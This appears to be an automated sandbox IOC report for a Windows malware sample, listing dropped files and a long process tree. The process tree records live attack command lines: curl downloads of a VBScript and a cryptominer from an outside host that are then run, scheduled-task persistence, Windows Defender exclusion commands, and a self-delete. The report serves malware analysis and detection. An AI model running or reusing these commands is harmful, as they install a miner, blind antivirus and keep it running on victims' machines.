IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\miner2.0.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\svchost64.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\System32\Microsoft\Libs\WR64.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\Microsoft\Libs\sihost64.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\System32\services64.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\miner2.0.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services64.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost64.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02hfu414.g3e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jx2i0vc.koj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lquwdk3.nnf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sw33nuf.jy0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gsrsrja.otm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2um1ksua.x0s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xny5hdv.suy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31duozca.a5x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32diwoqo.zw0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41hzin4b.qnl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gidlnea.ioj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qg3ylqg.thb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52ry0z4r.krq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lvba4oa.lzy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcp1dl5w.ic2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brubbskd.pmu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bts5qy3n.dum.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq2y13qs.05z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_filg3bsn.kem.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxvreusi.1sl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvskkmcc.jaj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpmlhrna.tyu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i02hwxoy.f3q.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkkpn3xr.jvc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kiblwhx0.4lb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le3d3htk.z3y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbnsteeo.d1v.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmogvf2g.cnm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc0uracz.ybw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwzt31qj.w0n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obwtrypu.yot.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olgk2ovd.h1z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pg1w0tfz.adz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnasfq31.j1w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_regrbua4.eyv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rojvywag.cf5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sogqcheu.p1k.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqrvq2m1.2c2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkejrq4.la2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw5xsb3k.02t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vokszajx.bpx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wennl4vp.ldk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfnmin1d.o05.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsmpyfit.gke.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvbc1o0h.dar.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xizpgnqk.kfe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5qqkr2y.gq5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhyndefk.d02.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\conf.vbs
ASCII text
modified
C:\Windows\Tasks\axplong.job
data
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 58 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
malicious
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
malicious
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
malicious
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
"C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
malicious
C:\Windows\System32\cscript.exe
cscript conf.vbs
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
malicious
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Users\user\AppData\Local\Temp\miner2.0.exe
miner2.0.exe
malicious
C:\Windows\System32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
malicious
C:\Users\user\AppData\Local\Temp\svchost64.exe
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
malicious
C:\Windows\System32\services64.exe
C:\Windows\system32\services64.exe
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\services64.exe
"C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
malicious
C:\Users\user\AppData\Local\Temp\svchost64.exe
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
malicious
C:\Windows\System32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
malicious
C:\Users\user\AppData\Local\Temp\svchost64.exe
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
malicious
C:\Windows\System32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 193 hidden processes, click here to show them.

URLs

Name
IP
Malicious
